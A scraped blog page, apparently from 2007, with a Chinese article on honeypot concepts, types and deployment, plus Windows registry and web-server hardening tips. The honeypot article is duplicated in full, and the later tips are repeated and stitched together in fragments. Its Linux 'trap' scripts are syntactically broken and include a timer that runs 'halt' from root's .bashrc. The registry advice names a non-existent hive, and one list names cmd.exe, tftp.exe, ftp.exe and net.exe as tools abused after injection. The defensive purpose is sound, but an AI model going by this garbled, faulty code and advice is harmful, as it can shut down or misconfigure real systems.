淺談蜜罐誘騙的基礎知識
[ 2007-03-25 03:08:17 | 作者: sun ]
1.引言
隨著人類社會生活對Internet需求的日益增長,網絡安全逐漸成為Internet及各項網絡服務和應用進一步發展的關鍵問題,特別是1993年以后Internet開始商用化,通過Internet進行的各種電子商務業務日益增多,加之Internet/Intranet技術日趨成熟,很多組織和企業都建立了自己的內部網絡并將之與Internet聯通。上述上電子商務應用和企業網絡中的商業秘密均成為攻擊者的目標。據美國商業雜志《信息周刊》公布的一項調查報告稱,黑客攻擊和病毒等安全問題在2000年造成了上萬億美元的經濟損失,在全球范圍內每數秒鐘就發生一起網絡攻擊事件。2003年夏天,對于運行著Microsoft Windows的成千上萬臺主機來說簡直就是場噩夢!也給廣大網民留下了悲傷的回憶,這一些都歸結于沖擊波蠕蟲的全世界范圍的傳播。
2.蜜罐技術的發展背景
網絡與信息安全技術的核心問題是對計算機系統和網絡進行有效的防護。網絡安全防護涉及面很廣,從技術層面上講主要包括防火墻技術、入侵檢測技術,病毒防護技術,數據加密和認證技術等。在這些安全技術中,大多數技術都是在攻擊者對網絡進行攻擊時對系統進行被動的防護。而蜜罐技術可以采取主動的方式。顧名思義,就是用特有的特征吸引攻擊者,同時對攻擊者的各種攻擊行為進行分析并找到有效的對付辦法。(在這里,可能要聲明一下,剛才也說了,“用特有的特征去吸引攻擊者”,也許有人會認為你去吸引攻擊者,這是不是一種自找麻煩呢,但是,我想,如果攻擊者不對你進行攻擊的話,你又怎么能吸引他呢?換一種說話,也許就叫誘敵深入了)。
3. 蜜罐的概念
在這里,我們首先就提出蜜罐的概念。美國 L.Spizner是一個著名的蜜罐技術專家。他曾對蜜罐做了這樣的一個定義:蜜罐是一種資源,它的價值是被攻擊或攻陷。這就意味著蜜罐是用來被探測、被攻擊甚至最后被攻陷的,蜜罐不會修補任何東西,這樣就為使用者提供了額外的、有價值的信息。蜜罐不會直接提高計算機網絡安全,但是它卻是其他安全策略所不可替代的一種主動防御技術。
具體的來講,蜜罐系統最為重要的功能是對系統中所有操作和行為進行監視和記錄,可以網絡安全專家通過精心的偽裝,使得攻擊者在進入到目標系統后仍不知道自己所有的行為已經處于系統的監視下。為了吸引攻擊者,通常在蜜罐系統上留下一些安全后門以吸引攻擊者上鉤,或者放置一些網絡攻擊者希望得到的敏感信息,當然這些信息都是虛假的信息。另外一些蜜罐系統對攻擊者的聊天內容進行記錄,管理員通過研究和分析這些記錄,可以得到攻擊者采用的攻擊工具、攻擊手段、攻擊目的和攻擊水平等信息,還能對攻擊者的活動范圍以及下一個攻擊目標進行了解。同時在某種程度上,這些信息將會成為對攻擊者進行起訴的證據。不過,它僅僅是一個對其他系統和應用的仿真,可以創建一個監禁環境將攻擊者困在其中,還可以是一個標準的產品系統。無論使用者如何建立和使用蜜罐,只有它受到攻擊,它的作用才能發揮出來。
4.蜜罐的具體分類和體現的安全價值
自從計算機首次互連以來,研究人員和安全專家就一直使用著各種各樣的蜜罐工具,根據不同的標準可以對蜜罐技術進行不同的分類,前面已經提到,使用蜜罐技術是基于安全價值上的考慮。但是,可以肯定的就是,蜜罐技術并不會替代其他安全工具,列如防火墻、系統偵聽等。這里我也就安全方面的價值來對蜜罐技術進行探討。
★ 根據設計的最終目的不同我們可以將蜜罐分為產品型蜜罐和研究型蜜罐兩類。
① 產品型蜜罐一般運用于商業組織的網絡中。它的目的是減輕受組織將受到的攻擊的威脅,蜜罐加強了受保護組織的安全措施。他們所做的工作就是檢測并且對付惡意的攻擊者。
⑴這類蜜罐在防護中所做的貢獻很少,蜜罐不會將那些試圖攻擊的入侵者拒之門外,因為蜜罐設計的初衷就是妥協,所以它不會將入侵者拒絕在系統之外,實際上,蜜罐是希望有人闖入系統,從而進行各項記錄和分析工作。
⑵雖然蜜罐的防護功能很弱,但是它卻具有很強的檢測功能,對于許多組織而言,想要從大量的系統日志中檢測出可疑的行為是非常困難的。雖然,有入侵檢測系統(IDS)的存在,但是,IDS發生的誤報和漏報,讓系統管理員疲于處理各種警告和誤報。而蜜罐的作用體現在誤報率遠遠低于大部分IDS工具,也務須當心特征數據庫的更新和檢測引擎的修改。因為蜜罐沒有任何有效行為,從原理上來講,任何連接到蜜罐的連接都應該是偵聽、掃描或者攻擊的一種,這樣就可以極大的減低誤報率和漏報率,從而簡化檢測的過程。從某種意義上來講,蜜罐已經成為一個越來越復雜的安全檢測工具了。
⑶如果組織內的系統已經被入侵的話,那些發生事故的系統不能進行脫機工作,這樣的話,將導致系統所提供的所有產品服務都將被停止,同時,系統管理員也不能進行合適的鑒定和分析,而蜜罐可以對入侵進行響應,它提供了一個具有低數據污染的系統和犧牲系統可以隨時進行脫機工作。此時,系統管理員將可以對脫機的系統進行分析,并且把分析的結果和經驗運用于以后的系統中。
② 研究型蜜罐專門以研究和獲取攻擊信息為目的而設計。這類蜜罐并沒有增強特定組織的安全性,恰恰相反,蜜罐要做的是讓研究組織面隊各類網絡威脅,并尋找能夠對付這些威脅更好的方式,它們所要進行的工作就是收集惡意攻擊者的信息。它一般運用于軍隊,安全研究組織。
★ 根據蜜罐與攻擊者之間進行的交互,可以分為3類:低交互蜜罐,中交互蜜罐和高交互蜜罐,同時這也體現了蜜罐發展的3個過程。
① 低交互蜜罐最大的特點是模擬。蜜罐為攻擊者展示的所有攻擊弱點和攻擊對象都不是真正的產品系統,而是對各種系統及其提供的服務的模擬。由于它的服務都是模擬的行為,所以蜜罐可以獲得的信息非常有限,只能對攻擊者進行簡單的應答,它是最安全的蜜罐類型。
② 中交互是對真正的操作系統的各種行為的模擬,它提供了更多的交互信息,同時也可以從攻擊者的行為中獲得更多的信息。在這個模擬行為的系統中,蜜罐可以看起來和一個真正的操作系統沒有區別。它們是真正系統還要誘人的攻擊目標。
③高交互蜜罐具有一個真實的操作系統,它的優點體現在對攻擊者提供真實的系統,當攻擊者獲得ROOT權限后,受系統,數據真實性的迷惑,他的更多活動和行為將被記錄下來。缺點是被入侵的可能性很高,如果整個高蜜罐被入侵,那么它就會成為攻擊者下一步攻擊的跳板。目前在國內外的主要蜜罐產品有DTK,空系統,BOF,SPECTER,HOME-MADE蜜罐,HONEYD,SMOKEDETECTOR,BIGEYE,LABREA TARPIT,NETFACADE,KFSENSOR,TINY蜜罐,MANTRAP,HONEYNET十四種。
5.蜜罐的配置模式
① 誘騙服務(deception service)
誘騙服務是指在特定的IP服務端口幀聽并像應用服務程序那樣對各種網絡請求進行應答的應用程序。DTK就是這樣的一個服務性產品。DTK吸引攻擊者的詭計就是可執行性,但是它與攻擊者進行交互的方式是模仿那些具有可攻擊弱點的系統進行的,所以可以產生的應答非常有限。在這個過程中對所有的行為進行記錄,同時提供較為合理的應答,并給闖入系統的攻擊者帶來系統并不安全的錯覺。例如,當我們將誘騙服務配置為FTP服務的模式。當攻擊者連接到TCP/21端口的時候,就會收到一個由蜜罐發出的FTP的標識。如果攻擊者認為誘騙服務就是他要攻擊的FTP,他就會采用攻擊FTP服務的方式進入系統。這樣,系統管理員便可以記錄攻擊的細節。
② 弱化系統(weakened system)
只要在外部因特網上有一臺計算機運行沒有打上補丁的微軟Windows或者Red Hat Linux即行。這樣的特點是攻擊者更加容易進入系統,系統可以收集有效的攻擊數據。因為黑客可能會設陷阱,以獲取計算機的日志和審查功能,需要運行其他額外記錄系統,實現對日志記錄的異地存儲和備份。它的缺點是“高維護低收益”。因為,獲取已知的攻擊行為是毫無意義的。
③ 強化系統(hardened system)
強化系統同弱化系統一樣,提供一個真實的環境。不過此時的系統已經武裝成看似足夠安全的。當攻擊者闖入時,蜜罐就開始收集信息,它能在最短的時間內收集最多有效數據。用這種蜜罐需要系統管理員具有更高的專業技術。如果攻擊者具有更高的技術,那么,他很可能取代管理員對系統的控制,從而對其它系統進行攻擊。
④用戶模式服務器(user mode server)
用戶模式服務器實際上是一個用戶進程,它運行在主機上,并且模擬成一個真實的服務器。在真實主機中,每個應用程序都當作一個具有獨立IP地址的操作系統和服務的特定是實例。而用戶模式服務器這樣一個進程就嵌套在主機操作系統的應用程序空間中,當INTERNET用戶向用戶模式服務器的IP地址發送請求,主機將接受請求并且轉發到用戶模式服務器上。(我們用這樣一個圖形來表示一下他們之間的關系):這種模式的成功與否取決于攻擊者的進入程度和受騙程度。它的優點體現在系統管理員對用戶主機有絕對的控制權。即使蜜罐被攻陷,由于用戶模式服務器是一個用戶進程,那么Administrator只要關閉該進程就可以了。另外就是可以將FIREWALL,IDS集中于同一臺服務器上。當然,其局限性是不適用于所有的操作系統。
6.蜜罐的信息收集
當我們察覺到攻擊者已經進入蜜罐的時候,接下來的任務就是數據的收集了。數據收集是設置蜜罐的另一項技術挑戰。蜜罐監控者只要記錄下進出系統的每個數據包,就能夠對黑客的所作所為一清二楚。蜜罐本身上面的日志文件也是很好的數據來源。但日志文件很容易被攻擊者刪除,所以通常的辦法就是讓蜜罐向在同一網絡上但防御機制較完善的遠程系統日志服務器發送日志備份。(務必同時監控日志服務器。如果攻擊者用新手法闖入了服務器,那么蜜罐無疑會證明其價值。)
近年來,由于黑帽子群體越來越多地使用加密技術,數據收集任務的難度大大增強。如今,他們接受了眾多計算機安全專業人士的建議,改而采用SSH等密碼協議,確保網絡監控對自己的通訊無能為力。蜜網對付密碼的計算就是修改目標計算機的操作系統,以便所有敲入的字符、傳輸的文件及其它信息都記錄到另一個監控系統的日志里面。因為攻擊者可能會發現這類日志,蜜網計劃采用了一種隱蔽技術。譬如說,把敲入字符隱藏到NetBIOS廣播數據包里面。
7.蜜罐的實際例子
下面我們以Redhat linux 9.0為平臺,做一個簡單的蜜罐陷阱的配置。
我們知道,黑客一旦獲得root口令,就會以root身份登錄,這一登錄過程就是黑客入侵的必經之路。其二,黑客也可能先以普通用戶身份登錄,然后用su命令轉換成root身份,這又是一條必經之路。
我們討論如何在以下情況下設置陷阱:
(1)當黑客以root身份登錄時;
(2)當黑客用su命令轉換成root身份時;
(3)當黑客以root身份成功登錄后一段時間內;
第一種情況的陷阱設置
一般情況下,只要用戶輸入的用戶名和口令正確,就能順利進入系統。如果我們在進入系統時設置了陷阱,并使黑客對此防不勝防,就會大大提高入侵的難度系數。例如,當黑客已獲取正確的root口令,并以root身份登錄時,我們在此設置一個迷魂陣,提示它,你輸入的口令錯誤,并讓它重輸用戶名和口令。而其實,這些提示都是虛假的,只要在某處輸入一個密碼就可通過。黑客因此就掉入這個陷阱,不斷地輸入root用戶名和口令,卻不斷地得到口令錯誤的提示,從而使它懷疑所獲口令的正確性,放棄入侵的企圖。
給超級用戶也就是root用戶設置陷阱,并不會給系統帶來太多的麻煩,因為,擁有root口令的人數不會太多,為了系統的安全,稍微增加一點復雜性也是值得的。這種陷阱的設置時很方便的,我們只要在root用戶的.profile中加一段程序就可以了。我們完全可以在這段程序中觸發其他入侵檢測與預警控制程序。陷阱程序如下:
# root .profile
Clear
Echo “You had input an error password , please input again !”
Echo
Echo –n “Login:”
Read p
If ( “$p” = “123456”) then
Clear
Else
Exit
第二種情況的陷阱設置
在很多情況下,黑客會通過su命令轉換成root身份,因此,必須在此設置陷阱。當黑客使用su命令,并輸入正確的root口令時,也應該報錯,以此來迷惑它,使它誤認為口令錯誤,從而放棄入侵企圖。這種陷阱的設置也很簡單,你可以在系統的/etc/profile文件中設置一個alias,把su命令重新定義成轉到普通用戶的情況就可以了,例如alias su=”su user1”。這樣,當使用su時,系統判斷的是user1的口令,而不是root的口令,當然不能匹配。即使輸入su root也是錯誤的,也就是說,從此屏蔽了轉向root用戶的可能性。
第三種情況的陷阱設置
如果前兩種設置都失效了,黑客已經成功登錄,就必須啟用登錄成功的陷阱。一旦root用戶登錄,就可以啟動一個計時器,正常的root登錄就能停止計時,而非法入侵者因不知道何處有計時器,就無法停止計時,等到一個規定的時間到,就意味著有黑客入侵,需要觸發必要的控制程序,如關機處理等,以免造成損害,等待系統管理員進行善后處理。陷阱程序如下:
# .testfile
times=0
while [ $times –le 30 ] do
sleep 1
times=$[times + 1]
done
halt /* 30秒時間到,觸發入侵檢測與預警控制 */
將該程序放入root .bashrc中后臺執行:
# root . bashrc
….
Sh .testfile&
該程序不能用Ctrl-C終止,系統管理員可用jobs命令檢查到,然后用kill %n將它停止。
從上述三種陷阱的設置,我們可以看到一個一般的規律:改變正常的運行狀態,設置虛假信息,使入侵者落入陷阱,從而觸發入侵檢測與預警控制程序。
8.關鍵技術設計
自蜜罐概念誕生之日起,相關技術一直在長足的發展。到今天為止,蜜罐技術應用的最高度應該說是Honeynet技術的實現。
9.總結
任何事物的存在都會有利弊,蜜罐技術的發展也是伴隨著各種不同的觀點而不斷的成長的。蜜罐技術是通過誘導讓黑客們誤入歧途,消耗他們的精力,為我們加強防范贏得時間。通過蜜網讓我們在受攻擊的同時知道誰在使壞,目標是什么。同時也檢驗我們的安全策略是否正確,防線是否牢固,蜜罐的引入使我們與黑客之間同處于相互斗智的平臺counter-intelligence,而不是處處遭到黑槍的被動地位。我們的網絡并不安全,IDS,FIREWALL,Encryption技術都有其缺陷性,我們期待它們與蜜罐的完美結合,那將是對網絡安全的最好禮物。我們完全相信,蜜罐技術必將在網絡安全中發揮出極其重要的作用,一場世界上聲勢浩大的蜜罐技術行動必將到來~
隨著人類社會生活對Internet需求的日益增長,網絡安全逐漸成為Internet及各項網絡服務和應用進一步發展的關鍵問題,特別是1993年以后Internet開始商用化,通過Internet進行的各種電子商務業務日益增多,加之Internet/Intranet技術日趨成熟,很多組織和企業都建立了自己的內部網絡并將之與Internet聯通。上述上電子商務應用和企業網絡中的商業秘密均成為攻擊者的目標。據美國商業雜志《信息周刊》公布的一項調查報告稱,黑客攻擊和病毒等安全問題在2000年造成了上萬億美元的經濟損失,在全球范圍內每數秒鐘就發生一起網絡攻擊事件。2003年夏天,對于運行著Microsoft Windows的成千上萬臺主機來說簡直就是場噩夢!也給廣大網民留下了悲傷的回憶,這一些都歸結于沖擊波蠕蟲的全世界范圍的傳播。
2.蜜罐技術的發展背景
網絡與信息安全技術的核心問題是對計算機系統和網絡進行有效的防護。網絡安全防護涉及面很廣,從技術層面上講主要包括防火墻技術、入侵檢測技術,病毒防護技術,數據加密和認證技術等。在這些安全技術中,大多數技術都是在攻擊者對網絡進行攻擊時對系統進行被動的防護。而蜜罐技術可以采取主動的方式。顧名思義,就是用特有的特征吸引攻擊者,同時對攻擊者的各種攻擊行為進行分析并找到有效的對付辦法。(在這里,可能要聲明一下,剛才也說了,“用特有的特征去吸引攻擊者”,也許有人會認為你去吸引攻擊者,這是不是一種自找麻煩呢,但是,我想,如果攻擊者不對你進行攻擊的話,你又怎么能吸引他呢?換一種說話,也許就叫誘敵深入了)。
3. 蜜罐的概念
在這里,我們首先就提出蜜罐的概念。美國 L.Spizner是一個著名的蜜罐技術專家。他曾對蜜罐做了這樣的一個定義:蜜罐是一種資源,它的價值是被攻擊或攻陷。這就意味著蜜罐是用來被探測、被攻擊甚至最后被攻陷的,蜜罐不會修補任何東西,這樣就為使用者提供了額外的、有價值的信息。蜜罐不會直接提高計算機網絡安全,但是它卻是其他安全策略所不可替代的一種主動防御技術。
具體的來講,蜜罐系統最為重要的功能是對系統中所有操作和行為進行監視和記錄,可以網絡安全專家通過精心的偽裝,使得攻擊者在進入到目標系統后仍不知道自己所有的行為已經處于系統的監視下。為了吸引攻擊者,通常在蜜罐系統上留下一些安全后門以吸引攻擊者上鉤,或者放置一些網絡攻擊者希望得到的敏感信息,當然這些信息都是虛假的信息。另外一些蜜罐系統對攻擊者的聊天內容進行記錄,管理員通過研究和分析這些記錄,可以得到攻擊者采用的攻擊工具、攻擊手段、攻擊目的和攻擊水平等信息,還能對攻擊者的活動范圍以及下一個攻擊目標進行了解。同時在某種程度上,這些信息將會成為對攻擊者進行起訴的證據。不過,它僅僅是一個對其他系統和應用的仿真,可以創建一個監禁環境將攻擊者困在其中,還可以是一個標準的產品系統。無論使用者如何建立和使用蜜罐,只有它受到攻擊,它的作用才能發揮出來。
4.蜜罐的具體分類和體現的安全價值
自從計算機首次互連以來,研究人員和安全專家就一直使用著各種各樣的蜜罐工具,根據不同的標準可以對蜜罐技術進行不同的分類,前面已經提到,使用蜜罐技術是基于安全價值上的考慮。但是,可以肯定的就是,蜜罐技術并不會替代其他安全工具,列如防火墻、系統偵聽等。這里我也就安全方面的價值來對蜜罐技術進行探討。
★ 根據設計的最終目的不同我們可以將蜜罐分為產品型蜜罐和研究型蜜罐兩類。
① 產品型蜜罐一般運用于商業組織的網絡中。它的目的是減輕受組織將受到的攻擊的威脅,蜜罐加強了受保護組織的安全措施。他們所做的工作就是檢測并且對付惡意的攻擊者。
⑴這類蜜罐在防護中所做的貢獻很少,蜜罐不會將那些試圖攻擊的入侵者拒之門外,因為蜜罐設計的初衷就是妥協,所以它不會將入侵者拒絕在系統之外,實際上,蜜罐是希望有人闖入系統,從而進行各項記錄和分析工作。
⑵雖然蜜罐的防護功能很弱,但是它卻具有很強的檢測功能,對于許多組織而言,想要從大量的系統日志中檢測出可疑的行為是非常困難的。雖然,有入侵檢測系統(IDS)的存在,但是,IDS發生的誤報和漏報,讓系統管理員疲于處理各種警告和誤報。而蜜罐的作用體現在誤報率遠遠低于大部分IDS工具,也務須當心特征數據庫的更新和檢測引擎的修改。因為蜜罐沒有任何有效行為,從原理上來講,任何連接到蜜罐的連接都應該是偵聽、掃描或者攻擊的一種,這樣就可以極大的減低誤報率和漏報率,從而簡化檢測的過程。從某種意義上來講,蜜罐已經成為一個越來越復雜的安全檢測工具了。
⑶如果組織內的系統已經被入侵的話,那些發生事故的系統不能進行脫機工作,這樣的話,將導致系統所提供的所有產品服務都將被停止,同時,系統管理員也不能進行合適的鑒定和分析,而蜜罐可以對入侵進行響應,它提供了一個具有低數據污染的系統和犧牲系統可以隨時進行脫機工作。此時,系統管理員將可以對脫機的系統進行分析,并且把分析的結果和經驗運用于以后的系統中。
② 研究型蜜罐專門以研究和獲取攻擊信息為目的而設計。這類蜜罐并沒有增強特定組織的安全性,恰恰相反,蜜罐要做的是讓研究組織面隊各類網絡威脅,并尋找能夠對付這些威脅更好的方式,它們所要進行的工作就是收集惡意攻擊者的信息。它一般運用于軍隊,安全研究組織。
★ 根據蜜罐與攻擊者之間進行的交互,可以分為3類:低交互蜜罐,中交互蜜罐和高交互蜜罐,同時這也體現了蜜罐發展的3個過程。
① 低交互蜜罐最大的特點是模擬。蜜罐為攻擊者展示的所有攻擊弱點和攻擊對象都不是真正的產品系統,而是對各種系統及其提供的服務的模擬。由于它的服務都是模擬的行為,所以蜜罐可以獲得的信息非常有限,只能對攻擊者進行簡單的應答,它是最安全的蜜罐類型。
② 中交互是對真正的操作系統的各種行為的模擬,它提供了更多的交互信息,同時也可以從攻擊者的行為中獲得更多的信息。在這個模擬行為的系統中,蜜罐可以看起來和一個真正的操作系統沒有區別。它們是真正系統還要誘人的攻擊目標。
③高交互蜜罐具有一個真實的操作系統,它的優點體現在對攻擊者提供真實的系統,當攻擊者獲得ROOT權限后,受系統,數據真實性的迷惑,他的更多活動和行為將被記錄下來。缺點是被入侵的可能性很高,如果整個高蜜罐被入侵,那么它就會成為攻擊者下一步攻擊的跳板。目前在國內外的主要蜜罐產品有DTK,空系統,BOF,SPECTER,HOME-MADE蜜罐,HONEYD,SMOKEDETECTOR,BIGEYE,LABREA TARPIT,NETFACADE,KFSENSOR,TINY蜜罐,MANTRAP,HONEYNET十四種。
5.蜜罐的配置模式
① 誘騙服務(deception service)
誘騙服務是指在特定的IP服務端口幀聽并像應用服務程序那樣對各種網絡請求進行應答的應用程序。DTK就是這樣的一個服務性產品。DTK吸引攻擊者的詭計就是可執行性,但是它與攻擊者進行交互的方式是模仿那些具有可攻擊弱點的系統進行的,所以可以產生的應答非常有限。在這個過程中對所有的行為進行記錄,同時提供較為合理的應答,并給闖入系統的攻擊者帶來系統并不安全的錯覺。例如,當我們將誘騙服務配置為FTP服務的模式。當攻擊者連接到TCP/21端口的時候,就會收到一個由蜜罐發出的FTP的標識。如果攻擊者認為誘騙服務就是他要攻擊的FTP,他就會采用攻擊FTP服務的方式進入系統。這樣,系統管理員便可以記錄攻擊的細節。
② 弱化系統(weakened system)
只要在外部因特網上有一臺計算機運行沒有打上補丁的微軟Windows或者Red Hat Linux即行。這樣的特點是攻擊者更加容易進入系統,系統可以收集有效的攻擊數據。因為黑客可能會設陷阱,以獲取計算機的日志和審查功能,需要運行其他額外記錄系統,實現對日志記錄的異地存儲和備份。它的缺點是“高維護低收益”。因為,獲取已知的攻擊行為是毫無意義的。
③ 強化系統(hardened system)
強化系統同弱化系統一樣,提供一個真實的環境。不過此時的系統已經武裝成看似足夠安全的。當攻擊者闖入時,蜜罐就開始收集信息,它能在最短的時間內收集最多有效數據。用這種蜜罐需要系統管理員具有更高的專業技術。如果攻擊者具有更高的技術,那么,他很可能取代管理員對系統的控制,從而對其它系統進行攻擊。
④用戶模式服務器(user mode server)
用戶模式服務器實際上是一個用戶進程,它運行在主機上,并且模擬成一個真實的服務器。在真實主機中,每個應用程序都當作一個具有獨立IP地址的操作系統和服務的特定是實例。而用戶模式服務器這樣一個進程就嵌套在主機操作系統的應用程序空間中,當INTERNET用戶向用戶模式服務器的IP地址發送請求,主機將接受請求并且轉發到用戶模式服務器上。(我們用這樣一個圖形來表示一下他們之間的關系):這種模式的成功與否取決于攻擊者的進入程度和受騙程度。它的優點體現在系統管理員對用戶主機有絕對的控制權。即使蜜罐被攻陷,由于用戶模式服務器是一個用戶進程,那么Administrator只要關閉該進程就可以了。另外就是可以將FIREWALL,IDS集中于同一臺服務器上。當然,其局限性是不適用于所有的操作系統。
6.蜜罐的信息收集
當我們察覺到攻擊者已經進入蜜罐的時候,接下來的任務就是數據的收集了。數據收集是設置蜜罐的另一項技術挑戰。蜜罐監控者只要記錄下進出系統的每個數據包,就能夠對黑客的所作所為一清二楚。蜜罐本身上面的日志文件也是很好的數據來源。但日志文件很容易被攻擊者刪除,所以通常的辦法就是讓蜜罐向在同一網絡上但防御機制較完善的遠程系統日志服務器發送日志備份。(務必同時監控日志服務器。如果攻擊者用新手法闖入了服務器,那么蜜罐無疑會證明其價值。)
近年來,由于黑帽子群體越來越多地使用加密技術,數據收集任務的難度大大增強。如今,他們接受了眾多計算機安全專業人士的建議,改而采用SSH等密碼協議,確保網絡監控對自己的通訊無能為力。蜜網對付密碼的計算就是修改目標計算機的操作系統,以便所有敲入的字符、傳輸的文件及其它信息都記錄到另一個監控系統的日志里面。因為攻擊者可能會發現這類日志,蜜網計劃采用了一種隱蔽技術。譬如說,把敲入字符隱藏到NetBIOS廣播數據包里面。
7.蜜罐的實際例子
下面我們以Redhat linux 9.0為平臺,做一個簡單的蜜罐陷阱的配置。
我們知道,黑客一旦獲得root口令,就會以root身份登錄,這一登錄過程就是黑客入侵的必經之路。其二,黑客也可能先以普通用戶身份登錄,然后用su命令轉換成root身份,這又是一條必經之路。
我們討論如何在以下情況下設置陷阱:
(1)當黑客以root身份登錄時;
(2)當黑客用su命令轉換成root身份時;
(3)當黑客以root身份成功登錄后一段時間內;
第一種情況的陷阱設置
一般情況下,只要用戶輸入的用戶名和口令正確,就能順利進入系統。如果我們在進入系統時設置了陷阱,并使黑客對此防不勝防,就會大大提高入侵的難度系數。例如,當黑客已獲取正確的root口令,并以root身份登錄時,我們在此設置一個迷魂陣,提示它,你輸入的口令錯誤,并讓它重輸用戶名和口令。而其實,這些提示都是虛假的,只要在某處輸入一個密碼就可通過。黑客因此就掉入這個陷阱,不斷地輸入root用戶名和口令,卻不斷地得到口令錯誤的提示,從而使它懷疑所獲口令的正確性,放棄入侵的企圖。
給超級用戶也就是root用戶設置陷阱,并不會給系統帶來太多的麻煩,因為,擁有root口令的人數不會太多,為了系統的安全,稍微增加一點復雜性也是值得的。這種陷阱的設置時很方便的,我們只要在root用戶的.profile中加一段程序就可以了。我們完全可以在這段程序中觸發其他入侵檢測與預警控制程序。陷阱程序如下:
# root .profile
Clear
Echo “You had input an error password , please input again !”
Echo
Echo –n “Login:”
Read p
If ( “$p” = “123456”) then
Clear
Else
Exit
第二種情況的陷阱設置
在很多情況下,黑客會通過su命令轉換成root身份,因此,必須在此設置陷阱。當黑客使用su命令,并輸入正確的root口令時,也應該報錯,以此來迷惑它,使它誤認為口令錯誤,從而放棄入侵企圖。這種陷阱的設置也很簡單,你可以在系統的/etc/profile文件中設置一個alias,把su命令重新定義成轉到普通用戶的情況就可以了,例如alias su=”su user1”。這樣,當使用su時,系統判斷的是user1的口令,而不是root的口令,當然不能匹配。即使輸入su root也是錯誤的,也就是說,從此屏蔽了轉向root用戶的可能性。
第三種情況的陷阱設置
如果前兩種設置都失效了,黑客已經成功登錄,就必須啟用登錄成功的陷阱。一旦root用戶登錄,就可以啟動一個計時器,正常的root登錄就能停止計時,而非法入侵者因不知道何處有計時器,就無法停止計時,等到一個規定的時間到,就意味著有黑客入侵,需要觸發必要的控制程序,如關機處理等,以免造成損害,等待系統管理員進行善后處理。陷阱程序如下:
# .testfile
times=0
while [ $times –le 30 ] do
sleep 1
times=$[times + 1]
done
halt /* 30秒時間到,觸發入侵檢測與預警控制 */
將該程序放入root .bashrc中后臺執行:
# root . bashrc
….
Sh .testfile&
該程序不能用Ctrl-C終止,系統管理員可用jobs命令檢查到,然后用kill %n將它停止。
從上述三種陷阱的設置,我們可以看到一個一般的規律:改變正常的運行狀態,設置虛假信息,使入侵者落入陷阱,從而觸發入侵檢測與預警控制程序。
8.關鍵技術設計
自蜜罐概念誕生之日起,相關技術一直在長足的發展。到今天為止,蜜罐技術應用的最高度應該說是Honeynet技術的實現。
9.總結
任何事物的存在都會有利弊,蜜罐技術的發展也是伴隨著各種不同的觀點而不斷的成長的。蜜罐技術是通過誘導讓黑客們誤入歧途,消耗他們的精力,為我們加強防范贏得時間。通過蜜網讓我們在受攻擊的同時知道誰在使壞,目標是什么。同時也檢驗我們的安全策略是否正確,防線是否牢固,蜜罐的引入使我們與黑客之間同處于相互斗智的平臺counter-intelligence,而不是處處遭到黑槍的被動地位。我們的網絡并不安全,IDS,FIREWALL,Encryption技術都有其缺陷性,我們期待它們與蜜罐的完美結合,那將是對網絡安全的最好禮物。我們完全相信,蜜罐技術必將在網絡安全中發揮出極其重要的作用,一場世界上聲勢浩大的蜜罐技術行動必將到來~
安全隱患:很多病毒都是通過注冊表中的RUN值進行加載而實現隨操作系統的啟動而啟動的,我們可以按照“禁止病毒啟動服務”中介紹的方法將病毒和木馬對該鍵值的修改權限去掉。
解決方法:運行“regedt32”指令啟動注冊表編輯器,找到注冊表中的
HKEY_CURRENT_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\RUN
分支,將Everyone對該分支的“讀取”權限設置為“允許”,取消對“完全控制”權限的選擇。這樣病毒和木馬就無法通過該鍵值啟動自身了。
病毒和木馬是不斷“發展”的,我們也要不斷學習新的防護知識,才能抵御病毒和木馬的入侵。與其在感染病毒或木馬后再進行查殺,不如提前做好防御工作,修筑好牢固的城墻進行抵御。畢竟亡羊補牢不是我們所希望發生的事情,“防患于未然”才是我們應該追求的。
解決方法:運行“regedt32”指令啟動注冊表編輯器,找到注冊表中的
HKEY_CURRENT_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\RUN
分支,將Everyone對該分支的“讀取”權限設置為“允許”,取消對“完全控制”權限的選擇。這樣病毒和木馬就無法通過該鍵值啟動自身了。
病毒和木馬是不斷“發展”的,我們也要不斷學習新的防護知識,才能抵御病毒和木馬的入侵。與其在感染病毒或木馬后再進行查殺,不如提前做好防御工作,修筑好牢固的城墻進行抵御。畢竟亡羊補牢不是我們所希望發生的事情,“防患于未然”才是我們應該追求的。
防止被黑之網絡服務器安全經驗談
[ 2007-03-25 03:07:47 | 作者: sun ]
1、對數據庫進行安全配置,例如你的程序連接數據庫所使用的帳戶/口令/權限,如果是瀏覽新聞的,用只讀權限即可;可以對不同的模塊使用不同的帳戶/權限;另外,數據庫的哪些存儲過程可以調用,也要進行嚴格地配置,用不到的全部禁用(特別是cmd這種),防止注入后利用數據庫的存儲過程進行系統調用;
2、在獲取客戶端提交的參數時,進行嚴格的過濾,包括參數長短、參數類型等等;
3、對管理員后臺進行嚴格的保護,有條件的話,應該設置為只允許特定的IP訪問(例如只允許管理員網段訪問)——這個要根據實際情況來看的;
4、對操作系統進行安全配置,防止注入后調用系統的功能,例如把
cmd.exe/tftp.exe/ftp.exe/net.exe
這些文件全部轉移到其他目錄,并對目錄進行嚴格的權限指派;
5、設置網絡訪問控制;
6、有條件的話,配置針對HTTP的內容過濾,過濾病毒、惡意腳本等;
7、如果有必要,可以考慮選擇HTTPS,這樣可以防止很多的注入工具掃描,我以前自己開發注入檢測工具的時候,考慮過做支持HTTPS方式的,但目前還沒付諸實施。
相信你也看出來了,總的來說程序方面主要考慮權限、參數過濾等問題;權限主要包括IIS瀏覽權限、數據庫調用權限。除此以外,還要考慮數據庫、操作系統的安全配置。另外,不知道你們在開發過程中會不會用到其他人開發的組件,例如圖片上傳之類的,這類組件你們研究過其安全性么?或者開發的過程中,絕大多數人會使用網上、書上提供的現成代碼,例如用戶登錄驗證等等,這些公開代碼,也要研究其安全性問題。
2、在獲取客戶端提交的參數時,進行嚴格的過濾,包括參數長短、參數類型等等;
3、對管理員后臺進行嚴格的保護,有條件的話,應該設置為只允許特定的IP訪問(例如只允許管理員網段訪問)——這個要根據實際情況來看的;
4、對操作系統進行安全配置,防止注入后調用系統的功能,例如把
cmd.exe/tftp.exe/ftp.exe/net.exe
這些文件全部轉移到其他目錄,并對目錄進行嚴格的權限指派;
5、設置網絡訪問控制;
6、有條件的話,配置針對HTTP的內容過濾,過濾病毒、惡意腳本等;
